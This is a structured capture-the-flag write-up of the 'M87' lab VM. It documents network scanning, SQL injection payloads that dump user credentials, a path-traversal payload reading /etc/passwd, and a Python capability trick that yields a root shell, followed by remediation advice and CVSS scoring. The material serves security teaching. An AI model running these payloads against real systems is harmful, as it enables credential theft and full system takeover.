## Version 1.4.1
## language: en

Feature:
  TOE:
    M87
  Category:
    Path Traversal
  Location:
    http://192.168.1.69/admin/backup/index.php?file=main
  CWE:
    CWE-22: Improper Limitation of a Pathname to a Restricted Directory
  Rule:
    REQ.137: Discard unsafe inputs
  Goal:
    Get the root shell
  Recommendation:
    Restrict the path of files to include

  Background:
  Hacker Software:
    | <Software name>   |  <Version> |
    | Parrot OS         |  4.10      |
    | Nmap              |  7.80      |
    | Wget              |  0.9       |
    | linpeas.sh        |  2.8.6     |
    | Dirb              |  2.22      |
    | VMWare            |  16.0      |

  TOE information:
    Given a file with the .OVA file extension is delivered
    When I run it on Vmware
    And I realize that a user is required to log in to the system
    Then I proceed to make a scan with nmap on my network with the command
    """
    $ nmap -sn 192.168.1.0/24
    Starting Nmap 7.80 ( https://nmap.org ) at 2020-11-17 07:48 -05
    Nmap scan report for 192.168.1.50
    Host is up (0.038s latency).
    Nmap scan report for 192.168.1.53
    Host is up (0.074s latency).
    Nmap scan report for 192.168.1.55
    Host is up (0.14s latency).
    Nmap scan report for 192.168.1.69
    Host is up (0.0059s latency).
    Nmap scan report for 192.168.1.73
    Host is up (0.000091s latency).
    Nmap scan report for 192.168.1.254
    Host is up (0.0079s latency).
    Nmap done: 256 IP addresses (6 hosts up) scanned in 7.33 seconds
    """
    When I determined that the IP of the machine is 192.168.1.69
    Then I scanned the IP and found it has 3 open ports
    """
    $ nmap 192.178.1.69
    Starting Nmap 7.80 ( https://nmap.org ) at 2020-11-17 10:09 -05
    Nmap scan report for 192.168.1.69
    Host is up (0.00088s latency).
    Not shown: 997 closed ports
    PORT     STATE    SERVICE
    22/tcp   filtered ssh
    80/tcp   open     http
    9090/tcp open     zeus-admin

    Nmap done: 1 IP address (1 host up) scanned in 1.94 seconds
    """

  Scenario: Normal use case
    Given I can access to the site
    When I see a login page
    Then when entering some credentials nothing happens [evidences](normal.png)

  Scenario: Static detection
    Given I can't access to the source code
    Then I can't do static detection

  Scenario: Fail: Dynamic detection with username parameters
    Given I see the port 80 open (HTTP)
    When I decide to analyze this service
    And the first thing I do is search for common directories on the server
    Then I do this with the "dirb" tool: [evidences](dirb.png)
    """
    $ dirb http://192.168.1.69/
    -----------------
    DIRB v2.22
    By The Dark Raver
    -----------------

    START_TIME: Tue Nov 17 07:50:14 2020
    URL_BASE: http://192.168.1.69/
    WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt

    -----------------

    GENERATED WORDS: 4612

    ---- Scanning URL: http://192.168.1.69/ ----
    ==> DIRECTORY: http://192.168.1.69/admin/
    ==> DIRECTORY: http://192.168.1.69/assets/
    + http://192.168.1.69/index.html (CODE:200|SIZE:1322)
    + http://192.168.1.69/LICENSE (CODE:200|SIZE:1073)
    + http://192.168.1.69/server-status (CODE:403|SIZE:277)

    ---- Entering directory: http://192.168.1.69/admin/ ----
    ==> DIRECTORY: http://192.168.1.69/admin/backup/
    ==> DIRECTORY: http://192.168.1.69/admin/css/
    ==> DIRECTORY: http://192.168.1.69/admin/images/
    + http://192.168.1.69/admin/index.php (CODE:200|SIZE:4393)
    ==> DIRECTORY: http://192.168.1.69/admin/js/

    ---- Entering directory: http://192.168.1.69/assets/ ----
    (!) WARNING: Directory IS LISTABLE. No need to scan it.
        (Use mode '-w' if you want to scan it anyway)

    ---- Entering directory: http://192.168.1.69/admin/backup/ ----
    + http://192.168.1.69/admin/backup/index.php (CODE:200|SIZE:4412)
    """
    And Dirb found several directories
    When I access the admin/backup directory
    """
    http://192.168.1.69/admin/backup/
    """
    And I see a simple login, I tried bypass the login with the following query
    """
    username: ' or'1'='1
    password ' or'1'='1

    http://192.168.1.69/admin/backup/?username=
    %27+or%271%27%3D%271&pass=%27+or%271%27%3D%271
    """
    Then I did not get anything useful by this means [evidences](nobypass.png)

  Scenario: Success: Dynamic detection with id parameter
    Given the parameters are taken by the GET method
    And to connect exclusively to the database you need a query "where id ="
    When I tried to analyze this parameter (id)
    """
    http://192.168.1.69/admin/backup/?id=1
    """
    And the site returned a name "jack" [evidences](id1.png)
    Then this means that I am interacting with the database
    Given I can interact with the database
    When my idea is to test for SQL bugs
    And the first thing I do is place a single quote
    """
    http://192.168.1.69/admin/backup/?id=1'
    """
    And the site returned a SQL syntax error [evidences](sqlbug.png)
    """
    You have an error in your SQL syntax; check the manual that corresponds to
    your MariaDB server version for the right syntax to use near ''' at line 1
    """
    Then the idea is to exploit this bug

  Scenario: Success: Exploiting the SQL bug manually
    Given the server is vulnerable to SQL injection
    When I exploited it is very simple because the type of injection is
    """
    SQL injection (integer)
    """
    And the first thing I did was list the number of columns with "order by"
    """
    http://192.168.1.69/admin/backup/?id=1 order by 1 -- -
    """
    When I got the number of columns (1) then I go on to list the DDBB tables
    """
    http://192.168.1.69/admin/backup/?id=1 union select
    group_concat(0x3c62723e, table_name) from information_schema.tables -- -
    """
    And one of them caught my attention "users" [evidences](usertables.png)
    """
    events_statements_summary_by_digest,
    users,
    accounts,
    hosts,
    socket_instances,
    socket_summary_by_instance,
    socket_summary_by_event_name,
    """
    And then I get the columns from the users table with the following query
    """
    http://192.168.1.69/admin/backup/?id=1 union select
    group_concat(0x3c62723e, column_name) from information_schema.columns
    where table_name = 'users' -- -

    jack
    id,
    username,
    password,
    email,
    USER,
    CURRENT_CONNECTIONS,
    TOTAL_CONNECTIONS
    """
    Then I get the email and password registers [evidences](users.png)
    """
    http://192.168.1.69/admin/backup/?id=1 union select
    group_concat(0x3a, email, 0x3a, password) from users -- -
    """

  Scenario: Fail: Trying to login
    Given I have the data of the database users
    When I try to log in with each of the users, nothing happens
    And seeing that port 9090 is running a zeus-admin [evidences](zeus.png)
    Then I tried to log in again by this means and did not succeed

  Scenario: Success: Analyzing another parameter (file)
    Given I cannot log in my idea is to try other attack vectors
    When I thought I would find a LFI, very common with PHP parameters
    And I tried the file parameter
    """
    http://192.168.1.69/admin/backup/?file=1
    """
    When I see that the server does not throw any error
    And I scan for LFI bug with the "lfiscan" tool
    """
    $ python lfiscan.py
    --url="http://192.168.1.69/admin/backup/index.php?file=main"

    [i] IP address / domain: 192.168.1.69
    [i] Script: /admin/backup/index.php
    [i] URL query string: file=main

    [i] It seems that the URL contains at least one parameter.
    [i] Trying to find also other parameters...
    [i] No other parameters were found.
    [i] The following 1 parameter(s) was/were found:
    [i] {'file': 'main'}
    [i] Probing parameter " file "...
    [+] Found signs of a LFI vulnerability! No nullbyte was required.
    [+] URL: http://192.168.1.69/admin/backup/index.php?file=
             ../../../../../../etc/passwd

    [i] A small log file was created.
    [i] Completed the scan. Will now exit!
    """
    Then I realize that there is an LFI bug [evidences](passwdlfi.png)

  Scenario: Success: Getting access and shell
    Given it is possible to read the /etc/passwd file through the LFI bug
    When I see the users there is one called "charlotte"
    """
    ...
    messagebus:x:104:110::/nonexistent:/usr/sbin/nologin
    avahi-autoipd:x:105:112:Avahi autoip daemon,,,:/var/lib/avahi-autoipd
    sshd:x:106:65534::/run/sshd:/usr/sbin/nologin
    charlotte:x:1000:1000:charlotte,,,:/home/charlotte:/bin/bash
    systemd-coredump:x:999:999:systemd Core Dumper:/:/usr/sbin/nologin
    ...
    """
    And I managed to log into zeus-admin with this username
    And the admin password [evidences](login.png)(shell.png)
    Then looking at the administration panel a bit, I see a terminal
    """
    charlotte@M87:~$
    """

  Scenario: Success: Privilege escalation
    Given I got shell
    When the idea is to get root privileges
    Then for that I must find some way to escalate privileges
    When I found a suite called "linpeas"
    """
    https://github.com/carlospolop/privilege-escalation-
    awesome-scripts-suite/blob/master/linPEAS/linpeas.sh
    """
    And it is a full scanner of possibilities to perform a LPE
    When i decided to try it
    """
    $ wget https://github.com/carlospolop/privilege-escalation-
    awesome-scripts-suite/blob/master/linPEAS/linpeas.sh
    ...
    $ ./linpeas.sh
    """
    And I got a lot of information
    And in the capabilities section I found that "/usr/bin/old"
    Then could be used to escalate privileges [evidences](filecapabilies.png)
    """
    charlotte@M87:~$ /usr/bin/old
    Python 2.7.16 (default, Oct 10 2019, 22:02:15)
    [GCC 8.3.0] on linux2
    Type "help", "copyright", "credits" or "license" for more information.
    >>>
    """
    When I run the binary and see that it is actually Python
    Then privilege escalation becomes very easy [evidences](rootshell.png)
    """
    >>> import os
    >>> os.setuid(0)
    >>> os.system('/bin/bash')

    root@M87:~#
    """

  Scenario: Remediation
    Given this vulnerability is Path Traversal or LFI
    Then a general way to solve it is to take the relative path of the files
    And this can be implemented with the functions "realpath()" or "basepath()"
    """
    // based on https://stackoverflow.com/a/4205278

    $basepath = '/foo/bar/baz/';
    $realBase = realpath($basepath);

    $userpath = $basepath . $_GET['path'];
    $realUserPath = realpath($userpath);

    if ($realUserPath === false || strpos($realUserPath, $realBase) !== 0) {
        //Directory Traversal!
    } else {
        //Good path!
    }
    """
    And to prevent SQL injection there are many ways, for example
    """
    - Use of Prepared Statements (with Parameterized Queries)
    - Use of Stored Procedures
    - Whitelist Input Validation
    - Escaping All User Supplied Input
    """

  Scenario: Scoring
    Severity scoring according to CVSSv3 standard
    Base: Attributes that are constants over time and organizations
      9.6/10 (High) - AV:A/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H
    Temporal: Attributes that measure the exploit's popularity and fixability
      8.5/10 (High) - E:P/RL:W/RC:R
    Environmental:Unique and relevant attributes to a specific user environment
      8.5/10 (High) - CR:L/IR:M/AR:M/MAV:A/MAC:L/MPR:N/MUI:N

  Scenario: Correlations
    No correlations have been found to this date {2020-11-17}
